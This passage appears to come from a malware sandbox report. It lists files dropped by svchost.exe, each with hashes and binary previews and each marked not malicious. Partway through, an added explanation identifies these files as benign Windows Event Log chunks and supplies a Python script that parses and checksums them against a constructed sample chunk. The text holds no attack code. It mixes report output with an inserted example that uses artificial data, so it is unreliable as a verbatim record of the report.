                                                                                                  SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                                                                  MD5:B074238315662886E2BD70106D08A747
                                                                                                  SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                                                                  SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                                                                  SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.7510752026907066
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:FXhVUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:FXbnS
                                                                                                  MD5:40D45DD21098C7D103456448E14AD36E
                                                                                                  SHA1:966A0F6F4CFC8078D1CD085EBC37BC3E70F9CE39
                                                                                                  SHA-256:6BA39207AC02FD1DDB18A9463F63CF11B2C6A7977F29E934B124393FB700613D
                                                                                                  SHA-512:F3EC1381AF73CA76FF605BE0B4F65C6CAD648FF3B5AA1D58831EB83A7A443E504DB5E30081CC21C7FD8939598DEB5D761CA8C895A94897F01B5B4E08C0325054
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........%...............%............E..`G..d..........................................................................................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.3069197485541766
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                                                                  MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                                                                  SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                                                                  SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                                                                  SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2680
                                                                                                  Entropy (8bit):3.8633382242665317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:M1pW8PCKOrCK3QbB69DOvExCKOrCK3Qbkcqr+XCKOrCK3Qbkcqra:uPCKOrCKgl69DOgCKOrCKgbkcG+XCKOu
                                                                                                  MD5:4C72ABD8033D0B8F3A5D43D863FAFE28
                                                                                                  SHA1:8E61E09D93021CC79098F9C6B0674DA535C9E465
                                                                                                  SHA-256:9DC248C60CA18065CEC16F718EDE6FBA24EFE4512C4E3CB6E98B361EBD39F45B
                                                                                                  SHA-512:4B7231773777092E422837B6589E1B2D9421F27AD46700C71F0C6A9443B87A3F8479511D0436E879219D946FCEBE9132E7D4579E4A6DD7E3AD67CDC9B9F65D28
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........&...............&...........0...0....?........................................................................K.................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**......$.......R.9..............................................................................L.......b.....!.................R.9......&O......'O........D...$....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^'...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.2909571978750325
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                                                                  MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                                                                  SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                                                                  SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                                                                  SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.488768580471203
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                                                                  MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                                                                  SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                                                                  SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                                                                  SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.499689077478035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ncRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20GW:ncRFkL1TWX0gkB/J7oasEfyk2/vKlqk+
                                                                                                  MD5:6D78A47EA17EB775B015A42F5059812E
                                                                                                  SHA1:554190047392263D9A03980875A02DBB49F4A7AA
                                                                                                  SHA-256:7998186361DE73867435ABC1264ACB847A4699FDCC4E6F99A3BA4104E7F3F28D
                                                                                                  SHA-512:3E2A1336B788FFD59C5077B459917ED26C75DAF4A94B8E23F6536903770F3DE5106EA17FDFA2F8D56C9F41FA2590DB90865F0A1C90CC75218C6ED219B5FD0643
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.>...............>............................a.......................................................................R'.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.495003969157729
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:mhN7s7o787l7r787a7J7z7+7N17g777+7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:m9juCg
                                                                                                  MD5:ACC76E29B3F225492060FB5F4D82EE21
                                                                                                  SHA1:7CA303EA5E3B87FF6A28C67771BE2D7D851A7688
                                                                                                  SHA-256:343B61CFAE4F555D90DB2F0D32A80AFEFEE31F61A1E93BEDCA02A1B5C542B793
                                                                                                  SHA-512:0607ADD00EED3FEBB41C8FB385595D41FF431DC9141C415274A87CEE9D9C51BC393E598EED579EF5A5E861B1AEDB59CDBDFAF8DFD4365ECAAC994146644F384B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.Y.......g.......Y.......g............%...&........................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.1499045494600955
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                                                                  MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                                                                  SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                                                                  SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                                                                  SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.8164696340947971
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                                                                  MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                                                                  SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                                                                  SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                                                                  SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.9855903635327656
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                                                                                  MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                                                                  SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                                                                  SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                                                                  SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.165454452307923
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                                                                  MD5:B6B6F199DA64422984403D7374F32528
                                                                                                  SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                                                                  SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                                                                  SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.8519554794255333
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                                                                  MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                                                                  SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                                                                  SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                                                                  SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.1642919553794224
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                                                                  MD5:D7EECF043241FDB9486580582E208603
                                                                                                  SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                                                                  SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                                                                  SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70264
                                                                                                  Entropy (8bit):4.574132704825596
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:KTEGIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbR:K4Z+Jao7mce8pt
                                                                                                  MD5:C549E7A49DD022CA2DE027214097D53E
                                                                                                  SHA1:A00B25B3076452C779DA1B0BB146DC59B3240414
                                                                                                  SHA-256:EA6172C80714D08136A5A1A1A58CE91D398C6262A7322D3D12797447527F25F3
                                                                                                  SHA-512:9761843BB4FEBAAA560260E72D85321AF1AABCE8680A8A00292D87DE0C2AE9A1FF6E2C1AB34A81553103B0A63725534F55E81325FEE81D417FB94CC76C4DAC58
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........................................."...T......................................................................e..;........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.............._...............&.......................................................................F.....!...A.A..........._.......&O......'O.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......................I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r
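The entries above are reported as "File Type: data" with "Malicious: false", yet every preview opens with "ElfChnk" and the "**" markers of event records: they are 64 KiB Windows Event Log (EVTX) chunks flushed by the Event Log service (svchost.exe) during the run, not payloads dropped by GGLoader.exe. libmagic prints "data" because a bare chunk lacks the "ElfFile" header of a complete .evtx file. The following Python is an added example, not part of the Joe Sandbox report: it recognises such fragments, validates both chunk checksums, and walks the records. The chunk and record layout follow the public EVTX format description; the sample chunk, its record identifiers and timestamp are constructed here, and its event payloads are placeholder bytes rather than real BinXML.

```python
"""Triage helper for the EVTX chunk fragments listed above.

Added example, not part of the Joe Sandbox report.  Chunk and record layout follow
the public EVTX format description; the sample chunk is constructed here, and its
event payloads are placeholder bytes rather than real BinXML.
"""
import struct
import zlib
from datetime import datetime, timedelta, timezone

CHUNK_MAGIC = b"ElfChnk\x00"        # per-chunk header: what every dropped file above starts with
FILE_MAGIC = b"ElfFile\x00"         # whole-.evtx file header, absent from a bare chunk
RECORD_MAGIC = b"\x2a\x2a\x00\x00"  # the "**" visible in the previews above
CHUNK_SIZE = 0x10000                # 65536 bytes, the size of almost every entry above
RECORDS_START = 0x200               # event records begin after the 512-byte chunk header
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def from_filetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def to_filetime(dt: datetime) -> int:
    """Inverse of from_filetime, kept in integer arithmetic to avoid float rounding."""
    d = dt - EPOCH_1601
    return ((d.days * 86400 + d.seconds) * 1_000_000 + d.microseconds) * 10


def classify(buf: bytes) -> str:
    """libmagic reports these files as 'data': they start with the chunk magic,
    not the ElfFile header that identifies a complete .evtx file."""
    if buf.startswith(FILE_MAGIC):
        return "evtx-file"
    if buf.startswith(CHUNK_MAGIC):
        return "evtx-chunk"
    return "other"


def header_crc(chunk: bytes) -> int:
    """Chunk checksum: CRC32 over bytes 0..120 and 128..512 (the checksum slot is skipped)."""
    return zlib.crc32(chunk[:120] + chunk[128:512]) & 0xFFFFFFFF


def parse_chunk(buf: bytes) -> dict:
    """Parse the first chunk in buf: header fields, both CRCs, and the record list."""
    chunk = buf[:CHUNK_SIZE]
    if len(chunk) < RECORDS_START or not chunk.startswith(CHUNK_MAGIC):
        raise ValueError("not an EVTX chunk")
    (first_num, last_num, first_id, last_id, hdr_size, last_rec_off,
     free_off, records_crc, stored_crc) = struct.unpack_from("<4Q4I64x4xI", chunk, 8)
    if not RECORDS_START <= free_off <= len(chunk):
        raise ValueError("free space offset outside chunk")
    records = []
    pos = RECORDS_START
    while pos + 24 <= free_off and chunk[pos:pos + 4] == RECORD_MAGIC:
        size, rec_id, written = struct.unpack_from("<IQQ", chunk, pos + 4)
        # A record carries its size twice; a mismatch or overrun means a torn record.
        if size < 28 or pos + size > free_off:
            break
        if struct.unpack_from("<I", chunk, pos + size - 4)[0] != size:
            break
        records.append({"id": rec_id, "size": size, "written": from_filetime(written),
                        "payload": chunk[pos + 24:pos + size - 4]})
        pos += size
    return {
        "first_record_number": first_num, "last_record_number": last_num,
        "first_record_id": first_id, "last_record_id": last_id,
        "header_size": hdr_size, "last_record_offset": last_rec_off,
        "free_space_offset": free_off,
        "header_crc_ok": stored_crc == header_crc(chunk),
        "records_crc_ok": records_crc == (zlib.crc32(chunk[RECORDS_START:free_off]) & 0xFFFFFFFF),
        "records": records,
    }


def build_sample_chunk() -> bytes:
    """Constructed 64 KiB chunk with two records; payloads are placeholders, not BinXML."""
    base = datetime(2024, 10, 1, 12, 0, 0, tzinfo=timezone.utc)   # assumed timestamp
    body, offsets = b"", []
    for i, rec_id in enumerate((1001, 1002)):                       # assumed record ids
        payload = f"constructed event {rec_id}".encode() + b"\x00"
        size = 24 + len(payload) + 4
        offsets.append(RECORDS_START + len(body))
        body += (RECORD_MAGIC
                 + struct.pack("<IQQ", size, rec_id, to_filetime(base + timedelta(seconds=i)))
                 + payload + struct.pack("<I", size))
    free_off = RECORDS_START + len(body)
    header = bytearray(RECORDS_START)
    header[:8] = CHUNK_MAGIC
    struct.pack_into("<4Q4I", header, 8, 1001, 1002, 1001, 1002, 128,
                     offsets[-1], free_off, zlib.crc32(body) & 0xFFFFFFFF)
    # string and template offset tables (bytes 128..512) are left zero in this sample
    struct.pack_into("<I", header, 124, header_crc(bytes(header)))
    chunk = bytes(header) + body
    return chunk + b"\x00" * (CHUNK_SIZE - len(chunk))


if __name__ == "__main__":
    sample = build_sample_chunk()
    info = parse_chunk(sample)
    print(classify(sample), info["header_crc_ok"], info["records_crc_ok"])
    for r in info["records"]:
        print(r["id"], r["written"].isoformat(), r["payload"])
```

Run it against one of the 65536-byte files from the analysis (or the 70264-byte one, whose first 64 KiB is the chunk) to confirm the checksums and recover the record timestamps; a chunk whose records_crc_ok is False but header_crc_ok is True was captured mid-write, which is common for the live log the sandbox copies out. Decoding the BinXML payloads themselves is out of scope here and is best left to a full EVTX parser.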
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.1791080805927432
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUm4WUm:8Y7Ll
                                                                                                  MD5:A98A41F0A03756B408C161F1E5D63831
                                                                                                  SHA1:1971B19A7ACEF98A1BE782F330DF046690D25DB3
                                                                                                  SHA-256:558A4C0276B59960C028F6CB214BB95895401619B9ADF7DF74C4EF311C81E973
                                                                                                  SHA-512:D781D218E5131116CB0CCCA7D844DB71F9D6ECB5DC27325FA3C5EABB4BDA9C345D286DBAD5F1E9D820DA7BD31B613E950197F684D9B197D06CC002DE5FFF226A
                                                                                                  Malicious:false
